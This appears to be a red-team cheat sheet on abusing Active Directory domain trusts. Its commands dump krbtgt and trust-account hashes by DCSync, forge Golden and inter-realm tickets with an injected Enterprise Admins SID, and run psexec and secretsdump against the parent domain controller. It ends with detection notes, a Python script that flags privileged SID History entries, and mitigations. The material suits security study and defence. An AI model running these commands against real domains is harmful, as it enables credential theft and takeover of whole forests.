Trust Attacks

Overview

Active Directory trusts define authentication relationships between domains and forests. When domains trust each other, users in one domain can access resources in the other. Compromising a child domain allows escalation to the parent domain (and the entire forest) using the trust key or krbtgt hash with SID History injection. Cross-forest trusts can also be abused if misconfigurations exist.

ATT&CK Mapping

  • Tactics: TA0007 - Discovery, TA0005 - Defense Evasion
  • Techniques:
      • T1482 - Domain Trust Discovery
      • T1134.005 - Access Token Manipulation: SID-History Injection

Prerequisites

  • Domain Admin in at least one domain (for intra-forest escalation)
  • Valid domain credentials (for enumeration)

Techniques

Enumerate Trusts

# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -p <password> --bloodhound -c Trusts
# PowerShell
Get-ADTrust -Filter *
nltest /domain_trusts /all_trusts

# Trust details
Get-ADTrust -Identity "<trusted_domain>" | Select-Object *
# Impacket — query a trusted domain across the trust (findDelegation lists delegation settings in the target domain)
# https://github.com/fortra/impacket
impacket-findDelegation '<domain>/<user>:<password>' -target-domain <other_domain> -dc-ip <dc_ip>

Child-to-Parent Domain Escalation (SID History)

Within the same forest, child domain admins can forge a Golden Ticket with the Enterprise Admins SID from the parent domain injected via SID History.

Step 1 — Get trust key or child domain's krbtgt hash:

# Impacket — DCSync the krbtgt from child domain
# https://github.com/fortra/impacket
impacket-secretsdump '<child_domain>/<admin>:<password>@<child_dc>' -just-dc-user 'krbtgt'

# Or get the trust key (inter-realm trust account)
impacket-secretsdump '<child_domain>/<admin>:<password>@<child_dc>' -just-dc-user '<child_domain>$'

Step 2 — Get parent domain SID:

# Impacket
# https://github.com/fortra/impacket
impacket-lookupsid '<child_domain>/<admin>:<password>@<parent_dc>' 0

Step 3 — Forge Golden Ticket with extra SID:

# Impacket — golden ticket with Enterprise Admins SID (RID 519)
# https://github.com/fortra/impacket
impacket-ticketer -nthash <child_krbtgt_hash> -domain-sid <child_domain_sid> -domain <child_domain> -extra-sid <parent_domain_sid>-519 Administrator
# Mimikatz — golden ticket with extra SID
# https://github.com/gentilkiwi/mimikatz
mimikatz# kerberos::golden /user:Administrator /domain:<child_domain> /sid:<child_domain_sid> /krbtgt:<child_krbtgt_hash> /sids:<parent_domain_sid>-519 /ptt

Step 4 — Access parent domain:

export KRB5CCNAME=Administrator.ccache

# Impacket
# https://github.com/fortra/impacket
impacket-psexec '<child_domain>/Administrator@<parent_dc_hostname>' -k -no-pass
impacket-secretsdump '<child_domain>/Administrator@<parent_dc_hostname>' -k -no-pass

Inter-Realm Trust Ticket

Instead of forging a Golden Ticket, use the trust key directly to create an inter-realm TGT:

# Impacket — forge inter-realm ticket using trust key
# https://github.com/fortra/impacket
impacket-ticketer -nthash <trust_key_hash> -domain-sid <child_domain_sid> -domain <child_domain> -extra-sid <parent_domain_sid>-519 -spn 'krbtgt/<parent_domain>' Administrator

Cross-Forest Trust Abuse

Cross-forest trusts have SID Filtering enabled by default, which blocks SIDs with RID < 1000 (built-in privileged groups like Domain Admins, Enterprise Admins). Custom groups with RID >= 1000 pass through the filter. This limits but does not fully prevent cross-forest abuse. You can still:

  • Access resources explicitly shared across the trust
  • Enumerate the foreign forest
  • Exploit misconfigured permissions on shared resources

# Enumerate foreign domain through trust
# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc smb <foreign_dc> -u '<child_domain>/<user>' -p '<password>' --shares

If SID Filtering is disabled (misconfiguration), cross-forest escalation works the same as child-to-parent.

Detection Methods

Network-Based Detection

  • Inter-realm Kerberos traffic with unexpected SID History values
  • TGT requests with extra SIDs from child domain DCs

Host-Based Detection

  • Windows Security Event 4769 with SID History populated
  • Golden Ticket indicators (no corresponding AS-REQ, unusual ticket lifetimes)
  • DCSync targeting the trust account (<domain>$)
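As an added illustration (not part of the original cheat sheet): a small Python script that applies the RID < 1000 filtering rule described in the cross-forest section to a list of SIDs, and scans event records for SID History entries carrying a well-known privileged RID such as 519, the indicator the detection section calls out. The key=value record format, the domain SIDs and the account names are constructed sample values, not real Windows event fields.

```python
import re

# Constructed sample records (not real Windows events): one key=value line per
# ticket/logon event, with the SID History values the DC saw joined by ';'.
SAMPLE_EVENTS = [
    "EventID=4769 Account=Administrator@CHILD.CORP.LOCAL SidHistory=",
    "EventID=4769 Account=jdoe@CHILD.CORP.LOCAL SidHistory=S-1-5-21-1111-2222-3333-1105",
    "EventID=4769 Account=Administrator@CHILD.CORP.LOCAL SidHistory=S-1-5-21-9999-8888-7777-519",
    "EventID=4624 Account=svc@CHILD.CORP.LOCAL SidHistory=S-1-5-21-9999-8888-7777-1450",
]

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid):
    """Split a domain SID into (domain part, RID)."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    return m.group(1), int(m.group(2))


def sid_filter(sids):
    """Model of the cross-forest SID Filtering rule: RID < 1000 (built-in
    privileged groups) is dropped, RID >= 1000 passes. Returns (kept, dropped)."""
    kept, dropped = [], []
    for sid in sids:
        _, rid = split_sid(sid)
        (dropped if rid < 1000 else kept).append(sid)
    return kept, dropped


def parse_event(line):
    """Parse one constructed key=value record into a dict with a SID list."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    fields["SidHistory"] = [s for s in fields.get("SidHistory", "").split(";") if s]
    return fields


def flag_sid_history(lines):
    """Return (account, sid, domain_part, severity) per SID History entry. RID < 1000
    is 'high': a well-known RID such as 519 that an intra-forest trust passes unfiltered."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        for sid in ev["SidHistory"]:
            dom, rid = split_sid(sid)
            severity = "high" if rid < 1000 else "review"
            findings.append((ev["Account"], sid, dom, severity))
    return findings
```

Feed it the SID History values extracted from your own log pipeline; a 'high' finding whose domain part is the parent domain's SID, attached to a child-domain account, matches the escalation path described above.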

Mitigation Strategies

  • SID Filtering — ensure SID Filtering is enabled on all trusts (default for external/forest trusts)
  • Selective Authentication — restrict which accounts can authenticate across trusts
  • Monitor trust changes — alert on new trust creation or trust attribute modifications
  • Limit trust scope — remove trusts that are no longer needed
  • Reset krbtgt — after child domain compromise, reset the child krbtgt twice
